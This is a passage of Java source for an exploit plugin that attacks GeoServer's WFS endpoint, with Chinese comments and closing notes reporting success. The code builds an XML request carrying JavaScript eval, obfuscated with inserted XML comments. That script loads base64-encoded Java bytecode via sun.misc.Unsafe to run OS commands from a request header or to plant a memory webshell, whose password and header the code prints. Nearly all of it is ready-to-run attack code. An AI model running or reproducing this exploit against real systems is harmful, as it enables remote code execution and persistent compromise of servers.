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");
memshellcontent.setRequired(true); // 必填
args.add(memshellcontent);
argsUsageBinder.setArgsList(args);
return argsUsageBinder;
}
@Override
public void doExploit(ITarget iTarget, Map<String, Object> map, IResultOutput iResultOutput) {
String padding1 = """
<wfs:GetPropertyValue
service='WFS'
version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
>
<wfs:Query typeNames='tiger:poly_landmarks' />
<wfs:valueReference
>ev<!--!!!-->al(get<!--!!!-->Engin<!--!!!-->eByN<!--!!!-->ame(jav<!--!!!-->ax.scr<!--!!!-->ipt.Scrip<!--!!!-->tEngin<!--!!!-->eManager.new(),'js'),'
""";
String padding2 = """
";
var bt;
try {
bt = ja<!--!!!-->va.la<!--!!!-->ng.Cla<!--!!!-->ss.for<!--!!!-->Name("sun.misc.BAS<!--!!!-->E64Decoder").newIn<!--!!!-->stance().dec<!--!!!-->odeB<!--!!!-->uffer(str);
} catch (e) {
bt = jav<!--!!!-->a.util.Bas<!--!!!-->e64.getDe<!--!!!-->coder().de<!--!!!-->code(str);
}
var theU<!--!!!-->nsafe = ja<!--!!!-->va.la<!--!!!-->ng.Cl<!--!!!-->ass.forN<!--!!!-->ame("sun.m<!--!!!-->isc.Unsafe").getD<!--!!!-->eclared<!--!!!-->Field("theUn<!--!!!-->safe");
the<!--!!!-->Unsafe.setAc<!--!!!-->cessible(true);
uns<!--!!!-->afe = the<!--!!!-->Unsafe.get(null);
uns<!--!!!-->afe.defi<!--!!!-->neAnon<!--!!!-->ymousClass(ja<!--!!!-->va.lang.Class.for<!--!!!-->Name("java.lang.Class"), bt, null).newI<!--!!!-->nstance();
')</wfs:valueReference>
</wfs:GetPropertyValue>
""";
String proxyHost = "127.0.0.1";
int proxyPort = 8083;
// 创建代理对象
Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyHost, proxyPort));
String address = iTarget.getAddress();
try {
String command = (String) map.get("Command");
String memshellflaglocal = (String) map.get("memshellflag");
if(memshellflaglocal.contains("true")){
String memshell = (String) map.get("memshellcontent");
String payload = padding1 + "var str=\"" + memshell + padding2;
String targetUrl = address + "/geoserver/wfs";
URL url = new URL(targetUrl);
HttpURLConnection conn = (HttpURLConnection) url.openConnection(proxy);
conn.setRequestMethod("POST");
conn.setRequestProperty("Content-Type", "application/xml; utf-8");
conn.setRequestProperty("Accept", "application/xml");
conn.setDoOutput(true);
conn.setConnectTimeout(5000); // 连接超时 5秒
conn.setReadTimeout(10000); // 读取超时 10秒
try (OutputStream os = conn.getOutputStream()) {
byte[] input = payload.getBytes("utf-8");
os.write(input, 0, input.length);
}
// 获取响应状态码
int statusCode = conn.getResponseCode();
// 读取响应内容
String responseContent;
try (BufferedReader br = new BufferedReader(
new InputStreamReader(
(statusCode >= 200 && statusCode < 300) ?
conn.getInputStream() : conn.getErrorStream(),
"utf-8"))) {
StringBuilder response = new StringBuilder();
String line;
while ((line = br.readLine()) != null) {
response.append(line);
}
responseContent = response.toString();
if (statusCode == 200 && responseContent.contains("ClassCastException")){
iResultOutput.successPrintln("内存马注入成功,默认内存马为冰蝎4 Listener内存马,密码:Pytehvgju 请求头: User-Agent: Vfjykwj ");
}else{
iResultOutput.failPrintln("执行失败了~");
}
}
}
else{
String cmdClass = "yv66vgAAADQAzwgAVQoAGABWCgA+AFcKAFgAWQgAWgoAFgBbCABcCgAWAF0KAF4AXwoAXgBgCABhCABiCABjCABkCgBlAGYKAGUAZwoAGABoCgAWAGkIAGoKAB0AawgAbAcAbQoAFgBuBwBvCgBwAHEIAHIIAHMIAHQHAHUKAD4AdggAdwcAeAoAPgB5CgAgAHoKACAAewoAIAB8BwB9CAB+CgB/AIAKAB0AgQgAggoAHQCDCACECACFCACGCACHCgCIAIkKAIgAigoAiwCMBwCNCgAyAI4IAI8KADIAkAgAkQoAMgCSBwCTCgA4AFYKADgAlAoAMgCVCgA4AJYKACUAlwcAmAEAEGdldFJlcUhlYWRlck5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAY8aW5pdD4BAAMoKVYBAANydW4BAA1TdGFja01hcFRhYmxlBwCYBwCZBwCaBwBvBwBtBwB9AQAEZXhlYwEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7BwB1BwCbBwCcBwCNAQAKU291cmNlRmlsZQEADmdlb3NlcnZlci5qYXZhAQADY21kDABDAEQMAEUARAcAmQwAnQCeAQAQamF2YS5sYW5nLlRocmVhZAwAnwCgAQAMdGhyZWFkTG9jYWxzDAChAKIHAJoMAKMApAwApQCmAQAkamF2YS5sYW5nLlRocmVhZExvY2FsJFRocmVhZExvY2FsTWFwAQAFdGFibGUBACpqYXZhLmxhbmcuVGhyZWFkTG9jYWwkVGhyZWFkTG9jYWxNYXAkRW50cnkBAAV2YWx1ZQcApwwAqACpDAClAKoMAKsArAwArQBAAQAnb3JnLmVjbGlwc2UuamV0dHkuc2VydmVyLkh0dHBDb25uZWN0aW9uDACuAK8BAA5nZXRIdHRwQ2hhbm5lbAEAD2phdmEvbGFuZy9DbGFzcwwAsACxAQAQamF2YS9sYW5nL09iamVjdAcAsgwAswC0AQALZ2V0UmVzcG9uc2UBAApnZXRSZXF1ZXN0AQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwwAPwBAAQAJZ2V0V3JpdGVyAQATamF2YS9pby9QcmludFdyaXRlcgwATQBODAC1ALYMALcARAwAuABEAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAB29zLm5hbWUHALkMALoATgwAuwBAAQADd2luDAC8AL0BAAcvYmluL3NoAQACLWMBAAdjbWQuZXhlAQACL2MHAL4MAL8AwAwATQDBBwDCDADDAMQBABFqYXZhL3V0aWwvU2Nhbm5lcgwAQwDFAQACXGEMAMYAxwEAAAwAyADJAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAMoAywwAzABADADNAEAMAM4AQAEACWdlb3NlcnZlcgEAEGphdmEvbGFuZy9UaHJlYWQBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBABNqYXZhL2lvL0lucHV0U3RyZWFtAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAF2phdmEvbGFuZy9yZWZsZWN0L0FycmF5AQAJZ2V0TGVuZ3RoAQAVKExqYXZhL2xhbmcvT2JqZWN0OylJAQAnKExqYXZhL2xhbmcvT2JqZWN0O0kpTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAHZ2V0TmFtZQEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoAQAFY2xvc2UBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAARuZXh0AQAIdG9TdHJpbmcBAApnZXRNZXNzYWdlACEAPgAYAAAAAAAEAAIAPwBAAAEAQQAAABsAAQABAAAAAxIBsAAAAAEAQgAAAAYAAQAAAAkAAQBDAEQAAQBBAAAAKQABAAEAAAAJKrcAAiq3AAOxAAAAAQBCAAAADgADAAAADAAEAA0ACAAOAAIARQBEAAEAQQAAAhoABgAPAAABQbgABEwSBbgABhIHtgAITSwEtgAJLCu2AApOEgu4AAY6BBkEEgy2AAg6BRkFBLYACRkFLbYACjoGEg24AAY6BxkHEg62AAg6CBkIBLYACQE6CQM2ChUKGQa4AA+iADgZBhUKuAAQOgsZC8YAJBkIGQu2AAo6CRkJxgAWGQm2ABG2ABISE7YAFJkABqcACYQKAaf/xBkJtgAREhUDvQAWtgAXGQkDvQAYtgAZOgoZCrYAERIaA70AFrYAFxkKA70AGLYAGToLGQq2ABESGwO9ABa2ABcZCgO9ABi2ABk6DBkMtgAREhwEvQAWWQMSHVO2ABcZDAS9ABhZAyq3AB5TtgAZwAAdOg0ZDcYANBkLtgAREh8DvQAWtgAXGQsDvQAYtgAZwAAgOg4ZDioZDbcAIbYAIhkOtgAjGQ62ACSnAARMsQABAAABPAE/ACUAAgBCAAAAfgAfAAAAEgAEABMADwAUABQAFQAaABYAIQAXACoAGAAwABkAOAAaAD8AGwBIABwATgAdAFEAHwBeACAAZwAhAGwAIgB1ACMAigAkAI0AHwCTACkArAAqAMUAKwDeACwBBgAtAQsALgEnAC8BMgAwATcAMQE8ADQBPwAzAUAANgBGAAAAOwAG/wBUAAsHAEcHAEgHAEkHAEoHAEsHAEkHAEoHAEsHAEkHAEoBAAA4+gAF/wCoAAEHAEcAAEIHAEwAAAIATQBOAAEAQQAAASUABAAIAAAAlwQ9Eia4ACdOLcYAES22ACgSKbYAKpkABQM9HJkAGAa9AB1ZAxIrU1kEEixTWQUrU6cAFQa9AB1ZAxItU1kEEi5TWQUrUzoEuAAvGQS2ADC2ADE6BbsAMlkZBbcAMxI0tgA1OgYSNjoHGQa2ADeZAB+7ADhZtwA5GQe2ADoZBrYAO7YAOrYAPDoHp//fGQewTSxOLbYAPbAAAQAAAI4AjwAlAAIAQgAAADIADAAAADoAAgA7AAgAPAAYAD0AGgBAAEcAQQBUAEIAZABFAIwASACPAEkAkABKAJIASwBGAAAAPAAG/QAaAQcATxhRBwBQ/wAiAAgHAEcHAE8BBwBPBwBQBwBRBwBSBwBPAAAj/wACAAIHAEcHAE8AAQcATAABAFMAAAACAFQ=";
String cmdPayload = padding1 + "var str=\"" + cmdClass + padding2;
String targetUrl = address + "/geoserver/wfs";
URL url = new URL(targetUrl);
HttpURLConnection conn = (HttpURLConnection) url.openConnection(proxy);
conn.setRequestMethod("POST");
conn.setRequestProperty("Content-Type", "application/xml; utf-8");
conn.setRequestProperty("Accept", "application/xml");
conn.setRequestProperty("cmd",command);
conn.setDoOutput(true);
conn.setConnectTimeout(5000); // 连接超时 5秒
conn.setReadTimeout(10000); // 读取超时 10秒
OutputStream os = conn.getOutputStream();
byte[] input = cmdPayload.getBytes("utf-8");
os.write(input, 0, input.length);
// 获取响应状态码
int statusCode = conn.getResponseCode();
if (statusCode == 200) {
// 读取响应内容
String responseContent;
BufferedReader br = new BufferedReader(new InputStreamReader((statusCode >= 200) ? conn.getInputStream() : conn.getErrorStream(), "utf-8"));
StringBuilder response = new StringBuilder();
String line;
while ((line = br.readLine()) != null) {
response.append(line);
}
responseContent = response.toString();
iResultOutput.successPrintln(responseContent);
}
else {
iResultOutput.failPrintln("执行异常了1~");
}
}
}catch (Exception e){
iResultOutput.failPrintln("执行异常了1~");
}
}
}使用maven构建项目进行测试。
命令执行成功
内存马成功
